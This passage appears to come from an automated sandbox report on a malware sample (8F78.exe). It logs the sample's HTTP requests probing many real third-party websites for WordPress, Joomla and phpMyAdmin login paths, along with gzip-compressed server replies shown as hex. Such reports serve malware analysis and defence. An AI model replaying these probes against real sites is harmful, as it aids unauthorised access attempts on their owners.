                                                                                                                                                                                                                                                                                                                                Data Ascii: ouOHi69'=i=OI7>x|tD.%iImvMBeG_~JO=,msbgv~{]F{.)5Wt0+L:I^i[Ya<AWQQ`^jHUJGhPmkWYc+N?|a|;
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.380803108 CET1286INData Raw: 1a 93 ee 9f c2 e0 f5 15 84 93 a5 ba 65 e6 16 61 2a b1 68 36 54 bd 4e 47 e9 80 e8 e1 c5 fa 0e 08 51 eb 9f e2 da 3b 60 ca a6 d9 a8 75 87 67 c6 82 cd a9 85 7b 6c 17 2e 83 e2 e7 66 02 9b af af c0 de 01 6b 27 8d a9 c1 60 28 33 d9 8e 97 58 4f be a3 ff
                                                                                                                                                                                                                                                                                                                                Data Ascii: ea*h6TNGQ;`ug{l.fk'`(3XO(x>T?K/YU)hf_ncs^4?QbnmFOT30&!D'VY3sO3HjHB$551es!qL0TKJJQ73eqG
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.380911112 CET1286INData Raw: d0 37 8d e5 2a a2 45 bf 62 15 e1 5a d9 5e 8e 44 96 f4 e0 39 d4 34 23 dd c7 37 9c 5c 3a e3 f6 6f b9 a9 9e c9 28 34 0c b4 ad 76 6b 3e bb 8e 51 b3 87 84 b3 81 11 26 78 70 b8 82 da 37 89 38 cc 5b 2f 64 55 2e 0d c7 eb d4 88 57 96 56 cc 5e ac 50 9b d6
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7*EbZ^D94#7\:o(4vk>Q&xp78[/dU.WV^PM!*{o|:P>Z%G3!Ti"v7~=SzNFkyiza"`+r}G^*g8z251wn'WW41[
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.426273108 CET276OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=hg0s2enuefjtdt9jcr0vlbien2
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://janckulik.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.699698925 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                content-length: 19249
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c7 47 86 dc 27 e6 a7 85 42 e3 e7 94 25 2f 42 67 3a 65 e1 37 0b e6 3f 84 41 9c 43 b1 38 4c 58 b1 a4 80 74 4e 5f eb 73 b1 de 28 f0 47 a8 37 59 38 c2 d2 50 b0 5d 2a 15 04 73 87 45 1c cc 28 09 5d 28 21 87 e6 cf c7 7f 2e d0 ed cf c7 5e 60 27 40 df 3f 1f 47 33 ea 78 a3 b4 2a 4b
                                                                                                                                                                                                                                                                                                                                Data Ascii: IG |&?xAVV#5""Th"fS b}>Ti:lt>L<4%{%vt*&{{+^-{v!.[uv6!fgoEXL5a$'X0`Mk#x;c13{xM;VcJzcAlYW`X$?O0r\?}y]* #/'@~eQLl08u0{X}-xFdQ7wbiQE2St\@A=:eK>+`Y&[8&woEcOaa}T9h]TQ6M9nXITs-P887<iON'Imak?tL>jm6oYNMqlI37nusRC6'1{3aQ0<WlWkFNy]M~ow;iQ,v {vgF^,X>Lqp>=kRB#"S7^,13EG .EPqW_;BnKafVKsqR?c-j7O'GRAQ&1`[R!KG'B%/Bg:e7?AC8LXtN_s(G7Y8P]*sE(](!.^`'@?G3x*K


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                74192.168.2.454433141.98.102.194805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.775685072 CET178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.045123100 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 594
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 42 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 eb 0c 03 4c 6d f0 05 83 21 86 e9 76 77 3b cd 43 a7 9d 4d f6 a1 ed f4 41 d8 32 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f8 2e 16 91 da e4 14 96 2a e5 b3 ab 50 3f 80 93 6c 31 35 68 66 cc ae 70 84 92 78 76 05 d8 c2 94 2a 02 d1 92 c8 82 aa a9 b1 52 89 15 18 87 a4 8c a4 74 6a 3c 32 ba ce 85 54 06 44 22 53 34 43 d6 35 8b d5 72 1a d3 47 16 51 ab ec 98 c0 32 a6 18 e1 56 11 11 4e a7 8e 09 c5 52 b2 ec c1 52 c2 4a 98 9a 66 e2 04 b4 14 73 a1 8a 03 e0 4c b0 2c a6 4f 26 64 22 11 9c 8b b5 7e 23 32 5a b2 47 ba 9d af 98 e2 74 f6 49 4a 21 61 60 7b 61 bf 1a a8 88 85 da 6c df 75 d3 db 37 77 bd b9 88 37 f0 cf ae 5b 32 50 b6 58 aa 09 38 b6 dd ba 39 a2 94 db 3a 45 48 89 5c b0 6c 02 f6 f1 70 4e e2 98 65 8b a3 f1 6f bb b7 73 32 24 b8 7b 2b 21 29 e3 9b 09 58 24 cf 39 b5 8a 4d a1 68 6a c2 0f 1c 75 f8 33 89 ee ca fe 8f c8 69 82 71 47 17 82 c2 97 5b c3 84 cf 5a 83 c2 84 9f 28 7f a4 8a 45 c4 84 f7 12 cd 80 ea 27 59 61 15 54 b2 04 67 bc d7 a0 f0 41 70 d4 d9 a7 54 fc c5 8c 03 98 13 23 77 9b 74 2e b8 71 bc c3 39 89 1e 16 52 ac b2 d8 8a 34 d2 04 96 05 27 1d db 04 bb 65 96 8a c2 7b f7 c5 39 2c 25 0b 3a 01 49 62 ed 26 0b fd 44 9b 77 88 02 c7 6b c1 78 8c b3 4b 3c d7 0f 8e 11 c1 ce d1 23 94 c4 0d e5 44 e2 1c f0 ed 56 d7 3c 85 34 72 11 69 b8 45 f2 dc 8b 81 82 51 0b 86 de 16 c8 71 2f 47 1a 8c 5b e0 fb 7b a4 e1 c5 48 be d3 02 67 b0 53 93 7d b9 4c 5a e1 3b 91 dc c1 e5 40 1e aa c9 1d ed f5 ed 6d 51 06 ce 5b a1 1c dc 9d b7 33 9d eb fa 26 8c b4 01 5c f7 ad 48 81 df 82 41 f0 9f 08 15 0c 5a 7a 8f 6f 13 aa 91 17 44 81 89 51 60 c2 90 94 13 85 89 ec 6c 7e 58 3a 8d ec 60 ad e9 fc 81 29 eb 30 fa 38 cb 27 a0 e8 93 ba 39 c9 aa 29 98 74 39 df c6 e9 81 84 2f 87 f4 0b a0 17 81 d5 b1 8e c9 8b 12 b9 d7 28 3a 9e 1f d3 85 09 d7 b1 67 db 01 fa dd b5 9d b8 83 a1 d7 d4 59 95 4b f1 ec 40 91 ec 9e 4f d3 b3 3a bb d6 e7 07 c1 b5 64 43 77 75 0e f7 ec 43 00 dd 76 39 1c c8 4a 89 c6 36 c4 93 55 2c 49 2c d6 68 b2 c5 5c 27 24 34 fb fe 66 f7 2a c3 83 53 5f fa 9d 65 78 86 9a 15 bf 8f 19 51 5f 63 4f 33 bb 7e c5 ed 97 53 6c 7d b7 dc d2 6f 4a 66 9d 3d ab 7f cf ab 18 3d 7d 1b 96 7c fa f5 25 1d 4f e0 3a 49 92 d3 0e 30 17 32 a6 d2 d2 6a 5f 15 13 f0 9b 28 56 2a be be ca f4 1a 7d ef d8 64 5e 08 be 52 f4 98 5e 1a cf 6f 9e 9e 9c 26 ea c4 70 e9 54 89 90 69 ed 5f 18 29 b4 63 f9 3a 6a ad e7 31 55 fa 24 e1 6c 81 8b 47 e8 58 54 9e f5 8f ef 53 8a 91 0d 22 e3 1b 28 22 49 69 06 24 8b a1 93 92 27 ab 76 91 81 36 4c b7 e1 3e 2f fa 95 6e f5 c4 c0 6e 1d 91 be 5d 24 08 cb f6 82 38 5a 90 a6 7c e3 e1 ff 21 df 75 8c b5 19 e3 45 03 ae 0e fc eb 71 a2 7f c7 a6 28 8b 97 82 7d a5 3a 50 83 66 9c ed 8a 22 87 a6 e5 e5 56 cf b3 e6 8a 44 4c 4f 95 48 d5 2a 4e cf 7b 2d 1f 2c 9b fa a8 5d b9 4e 27 5a 0e 74 58 16 63 04 d9 fa 77 d2 ef b1 ae 52 22 7d 56 e6 d5 d4 ca 8d 4f d3 64 55 52 36 88 55 ca a9 64 70 9f 6f 20 ec d7 a5 6b d8 af 2a f4 ab 50 97 8a 75 59 1b b3 47 60 f1 d4 d8 19 dc d8 d7 b8 e1 d2 39 ac 86 b1 b7 27 e5 b3 df c4 4a e2 c9 f3 f7 8a 16 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4BFW[s6~8Lm!vw;CMA2-W!lg{lss0|sq.*P?l15hfpxv*Rtj<2TD"S4C5rGQ2VNRRJfsL,O&d"~#2ZGtIJ!a`{alu7w7[2PX89:EH\lpNeos2${+!)X$9Mhju3iqG[Z(E'YaTgApT#wt.q9R4'e{9,%:Ib&DwkxK<#DV<4riEQq/G[{HgS}LZ;@mQ[3&\HAZzoDQ`l~X:`)08'9)t9/(:gYK@O:dCwuCv9J6U,I,h\'$4f*S_exQ_cO3~Sl}oJf==}|%O:I02j_(V*}d^R^o&pTi_)c:j1U$lGXTS"("Ii$'v6L>/nn]$8Z|!uEq(}:Pf"VDLOH*N{-,]N'ZtXcwR"}VOdUR6Udpo k*PuYG`9'J
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.045165062 CET226INData Raw: 96 a4 80 b9 f6 ba 39 17 d1 03 8d df 85 fd fc 10 48 42 ff a0 bb 5d b4 76 8a 83 25 4b 72 91 12 ce 8f c7 74 fb 5c af 75 fb 71 02 a1 36 e5 2c 1e 05 24 b6 1d 12 38 43 7b 44 62 d7 a1 81 8b 03 9e e7 d8 fe c0 f7 ec b0 5f b2 85 f3 a3 e5 b7 ed 9e a5 08 47
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9HB]v%Krt\uq6,$8C{Db_G|b\Kgba>)q{$9h}69gwC{F:/b_]nq=w{J7Q20


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                75192.168.2.45447366.97.32.25805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.903794050 CET174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: emr.com.ar
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.163499117 CET467INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:58 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://emr.com.ar/index.php?uri=administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 255
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 72 2e 63 6f 6d 2e 61 72 2f 69 6e 64 65 78 2e 70 68 70 3f 75 72 69 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://emr.com.ar/index.php?uri=administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                76192.168.2.454517217.160.223.67805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.904218912 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.150667906 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.169322968 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://elossa.de/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.416105032 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                77192.168.2.454520217.160.223.67805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.904290915 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:40.205475092 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:40 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


